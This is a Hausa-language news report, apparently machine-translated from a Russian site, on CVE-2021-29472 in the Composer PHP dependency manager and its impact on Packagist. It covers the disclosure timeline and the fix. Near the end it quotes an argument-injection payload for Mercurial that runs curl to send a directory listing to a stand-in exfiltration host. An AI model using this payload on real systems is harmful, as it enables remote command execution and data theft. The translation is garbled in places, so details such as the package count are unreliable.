An gano wani mummunan rauni (CVE-2021-29472) a cikin Manajan dogaro na Mawaƙi wanda ke ba da damar aiwatar da umarni na sabani akan tsarin lokacin sarrafa fakiti tare da ƙayyadaddun ƙimar URL wanda ke ƙayyadaddun adireshin don zazzage lambar tushe. Matsalar tana faruwa a cikin abubuwan GitDriver, SvnDriver, da HgDriver da ake amfani da su lokacin amfani da Git, Subversion, da tsarin sarrafa tushen tushen Mercurial. An warware rashin lafiyar a cikin sakin Mawaki 1.10.22 da 2.0.13.
An lura da cewa batun da farko ya shafi ma'ajin kundi na Mawaki, Packagist, wanda ya ƙunshi fakiti 306 don masu haɓaka PHP kuma yana hidima fiye da abubuwan zazzagewa biliyan 1.4 a kowane wata. Gwajin ya nuna cewa idan akwai ilimin matsalar, maharan za su iya samun ikon sarrafa kayan aikin Packagist kuma su kutsa kai cikin bayanan masu kiyayewa ko tura abubuwan saukar da kunshin zuwa uwar garken ɓangare na uku, suna tsara isar da bambance-bambancen kunshin tare da mugayen canje-canje don maye gurbin bayan gida. a lokacin da dogara shigarwa tsari.
Haɗarin masu amfani na ƙarshe yana iyakance ga gaskiyar cewa abun ciki na composer.json yawanci mai amfani ne ke ƙayyade shi, kuma ana watsa hanyoyin haɗin yanar gizo yayin shiga wuraren ajiyar ɓangare na uku, waɗanda galibi amintacce ne. Babban bugun ya fadi akan ma'ajiyar Packagist.org da sabis na Packagist masu zaman kansu, wanda ake kira Composer tare da canja wurin bayanan da aka karɓa daga masu amfani. Maharan na iya aiwatar da lambar su akan sabar Packagist ta hanyar sanya fakitin da aka kera na musamman.
Ƙungiyar Packagist ta daidaita rashin lafiyar a cikin sa'o'i 12 da aka ba da rahoton rashin lafiyar. Masu binciken sun sanar da masu haɓaka Packagist a asirce a ranar 22 ga Afrilu, kuma an gyara matsalar a wannan rana. An buga sabuntawa na jama'a ga Mawaƙin da ke magance raunin a ranar 27 ga Afrilu, tare da bayyana cikakkun bayanai a ranar 28 ga Afrilu. Binciken rajistan ayyukan akan sabar Packagist bai bayyana duk wani aiki na tuhuma da ke da alaƙa da raunin ba.
Matsalar tana faruwa ne ta hanyar bug a cikin lambar tabbatar da URL a cikin tushen mawaki.json fayil da hanyoyin zazzage tushen. Kuskuren ya kasance a cikin lambar tun Nuwamba 2011. Packagist yana amfani da yadudduka na musamman don tsara lodin lamba ba tare da an ɗaure su da takamaiman tsarin sarrafa tushen ba, waɗanda ake aiwatar da su ta hanyar kiran "dagaShellCommandline" da wucewar gardamar layin umarni. Misali, don git, ana kiran umarnin "git ls-remote -heads $URL", inda ake sarrafa URL ɗin ta hanyar amfani da hanyar "ProcessExecutor:: Escape($url)", da guje wa ginannun haɗari masu haɗari kamar "$(. ..)" ko "'...".
Tushen matsalar ita ce hanyar ProcessExecutor:: hanyar tserewa ba ta kubuta daga jerin “—” ba, wanda ya ba da damar fayyace kowane ƙarin sigar kira a cikin URL. Irin wannan tserewa ya ɓace a cikin GitDriver.php, SvnDriver.php da direbobin HgDriver.php. Harin GitDriver.php ya sami cikas ta gaskiyar cewa umarnin "git ls-remote" bai goyi bayan ƙayyadaddun ƙarin muhawara ba bayan hanyar. An kai hari kan HgDriver.php ya zama mai yiwuwa ta hanyar wuce ma'aunin "-config" zuwa mai amfani "hq", wanda ke ba ka damar tsara aiwatar da kowane umarni ta hanyar sarrafa saitin "alias.identify". Misali, don zazzagewa da aiwatar da lamba ta hanyar gudanar da aikin curl, zaku iya saka: —config=alias.identify=!curl http://exfitration-host.tld —data “$(ls-alh)”
Ta hanyar buga fakitin gwaji tare da URL mai kama da Packagist, masu binciken sun tabbatar da cewa bayan aikawa, uwar garken su sun sami buƙatun HTTP daga ɗayan sabar Packagist a cikin AWS mai ɗauke da jerin fayiloli a cikin kundin adireshi na yanzu.
source: budenet.ru